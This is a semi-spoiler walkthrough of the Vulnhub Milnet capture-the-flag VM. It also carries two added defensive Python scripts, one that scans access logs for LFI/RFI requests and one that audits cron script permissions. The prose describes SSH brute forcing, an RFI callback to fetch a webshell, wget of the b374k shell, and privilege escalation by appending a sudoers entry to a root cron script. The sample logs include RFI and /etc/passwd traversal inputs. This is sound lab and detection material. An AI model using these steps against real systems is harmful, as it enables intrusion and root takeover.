7MS #200: Vulnhub Walkthrough - Milnet

Intro

The following is a semi-spoilerish walkthrough of the Milnet VM from Vulnhub by @teh_warriar.

Disclaimer

I'm intentionally not posting a full walkthrough for a few reasons:

  1. Full (and better) walkthroughs already exist online.

  2. By not posting the full details, it allows readers the chance to get just a little push in the right direction without ruining the entire challenge.

  3. I like to show my full thought process as I do a whole lot of stuff wrong before I start making good progress. We can both likely learn something from that :-)

Write-up

An Nmap scan will reveal ports 80 and 22 open. If you're like me, you get a kick out of using hydra or another similar tool to brute force root@the.target.ip.address just for fun ;-)

While that's going, whenever I see port 80 open I usually visit it in a browser, crawl it with Burp, run nikto on it, and dirb it. In the case of Milnet, this combination of tools should lead you to at least one weakness you can leverage for a shell.

I went with the LFI/RFI route, and this is one of my favorite types of vulns. I usually spin up SimpleHTTPServer and then tamper with requests in Burp to get the target host to "call" to my system. Once I know I'm able to do that, I use something in the /usr/share/webshells dir to get me an initial shell. From that initial shell, I use wget to pull down a better, more functional shell such as b374k.
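From the other side of the fence, the "call back to my system" step above leaves a very recognisable trace in the web server's access log: a query parameter whose value is a URL to another host (RFI), or one that walks the filesystem (LFI). The following is an added example, not code from the 7MS write-up or from the Milnet VM: a small Python scanner over combined-format access-log lines. The log lines are constructed for the demo (10.0.0.9 stands in for an attacker box serving a file over HTTP), and the `page` parameter name is an assumption, not something Milnet specifically uses.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qsl

# Apache/nginx combined-log style line: client, identity, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter values that point at another host are the RFI pattern; values that walk
# the filesystem are the LFI pattern. Both lists are deliberately short; extend to taste.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
LOCAL_MARKERS = ("../", "..\\", "/etc/passwd")


def classify_target(target):
    """Return [(param, kind)] for each query parameter that looks like LFI or RFI."""
    hits = []
    query = urlparse(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        v = value.lower()
        if v.startswith(REMOTE_SCHEMES):
            hits.append((name, "rfi"))
        elif any(marker in v for marker in LOCAL_MARKERS):
            hits.append((name, "lfi"))
    return hits


def scan_log(lines):
    """Parse access-log lines and return one finding per suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that don't fit the format rather than guess
        for name, kind in classify_target(m["target"]):
            findings.append({
                "ip": m["ip"],
                "kind": kind,
                "param": name,
                "status": int(m["status"]),
                "target": m["target"],
            })
    return findings


def sources_by_kind(findings):
    """Count (client ip, kind) pairs so a reviewer sees who is probing and how."""
    return Counter((f["ip"], f["kind"]) for f in findings)


# Constructed sample log lines (not taken from the Milnet VM). 10.0.0.9 plays the
# attacker box hosting a file over HTTP, the SimpleHTTPServer step from the write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2016:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1234',
    '10.0.0.9 - - [12/Mar/2016:10:00:07 +0000] "GET /index.php?page=http://10.0.0.9:8000/x.txt HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2016:10:00:12 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.7 - - [12/Mar/2016:10:00:30 +0000] "POST /login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']} {f['kind'].upper()} via {f['param']!r} -> {f['status']} {f['target']}")
    print(sources_by_kind(hits))
```

A 200 status on an RFI-shaped request is the line worth chasing first: it means the include most likely succeeded. On a real box you would feed the scanner `open("/var/log/apache2/access.log")` instead of the sample list, and the fix for the application itself is to stop passing user input into `include`/`require` at all (an allow-list of page names, with `allow_url_include` off in php.ini).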

Then, from my client machine I visited the b374k shell and did further enumeration: this usually includes some privesc-checking scripts, seeing if I can view /etc/passwd, and looking at any cron jobs that are set up. Oh, and don't forget to explore /home, as this folder structure contains a handful of .txt files which will help point you down a privesc path.

From there, I found a script that is called by cron which I can't edit directly but can append data to. This is where you can have some fun in how you privesc or grab the flag. I went the route of making the script add the www-data user to the /etc/sudoers file. Then I was able to explore the file structure freely and cat-ture the flag!
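The root cause of that last step is a file that cron runs as root but that a low-privilege user can write to (appending is still writing). The following is an added example, not part of the 7MS post or the Milnet VM: a Python audit that reads system-crontab style lines (`/etc/crontab`, `/etc/cron.d/*`), resolves the script each entry runs, and reports any script that is group- or world-writable or not owned by the expected user. The demo builds a throwaway cron layout in a temporary directory with one correctly permissioned script and one that anyone can append to; the script names and schedules are constructed.

```python
import os
import stat
import tempfile


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab or /etc/cron.d style lines.

    Format: minute hour day-of-month month day-of-week user command
    Comments, blank lines and VAR=value lines are skipped.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            entries.append((fields[5], fields[6]))
    return entries


def audit_script(path, expected_owner_uid=0):
    """List the ways a cron-invoked script could be altered by someone other than its owner."""
    problems = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing"]
    if st.st_mode & stat.S_IWGRP:
        problems.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    if st.st_uid != expected_owner_uid:
        problems.append("unexpected owner uid %d" % st.st_uid)
    return problems


def audit_crontab(text, expected_owner_uid=0):
    """Map each absolute script path found in crontab commands to its problems."""
    findings = {}
    for user, command in parse_system_crontab(text):
        script = command.split()[0]
        if not script.startswith("/"):
            continue  # relative commands resolve through PATH; out of scope here
        problems = audit_script(script, expected_owner_uid)
        if problems:
            findings[script] = problems
    return findings


def run_demo():
    """Build a constructed cron layout with one safe and one appendable script and audit it."""
    with tempfile.TemporaryDirectory() as d:
        safe = os.path.join(d, "rotate.sh")
        loose = os.path.join(d, "backup.sh")
        for p in (safe, loose):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\necho hi\n")
        os.chmod(safe, 0o755)   # owner-only write: fine
        os.chmod(loose, 0o777)  # group and world writable: anyone can append to it
        crontab = (
            "SHELL=/bin/sh\n"
            "# m h dom mon dow user command\n"
            f"*/5 * * * * root {loose} >/dev/null 2>&1\n"
            f"0 3 * * * root {safe} --weekly\n"
        )
        # The demo files are owned by whoever runs it, so compare against that uid;
        # on a real host leave the default of 0 (root).
        findings = audit_crontab(crontab, expected_owner_uid=os.getuid())
        return {os.path.basename(k): v for k, v in findings.items()}


if __name__ == "__main__":
    for script, problems in run_demo().items():
        print(f"{script}: {', '.join(problems)}")
```

On a real host, run it over `open("/etc/crontab").read()` plus each file in `/etc/cron.d`, and remember that the same check applies one level down: a root-owned, mode-755 script that sources or executes a file the web user can write to has the same problem, so follow the script's own references too. The fix is the boring one: `chmod 755` and `chown root:root` on anything cron runs, and no world-writable directories on its path.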